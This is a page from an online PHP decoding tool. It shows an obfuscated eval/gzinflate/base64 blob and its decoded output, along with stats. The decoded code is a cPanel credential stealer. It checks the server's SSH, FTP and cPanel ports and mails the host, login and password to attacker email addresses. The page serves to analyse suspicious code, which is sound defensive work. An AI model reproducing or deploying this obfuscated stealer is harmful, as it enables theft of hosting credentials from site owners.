Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN..

Decoded Output download

$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);


if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}

if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}

if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}


$psn ="
-------------------------------------------------------------------------

Cpanel Update Info [powered by GUINES Recode by Mask_magicianZ ] 

-------------------------------------------------------------------------

Host : $domain

User : $login

Pass : $pass

-------------------------------------------------------------------------

Accept Port 

SSH : Port $a1

FTP : Port $a2

cPanel : Port $a3

-------------------------------------------------------------------------

 2011 GUINES,Mask_magicianz Powered by RosebanditZ

-------------------------------------------------------------------------
";
$to = "[email protected]";
$recip = "[email protected]";
$subject = "cPanel AccesS Update";
$headers = "From: update<[email protected]>";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 0c4bb6ca134739cd72c144a7fb287f35
Eval Count 1
Decode Time 105 ms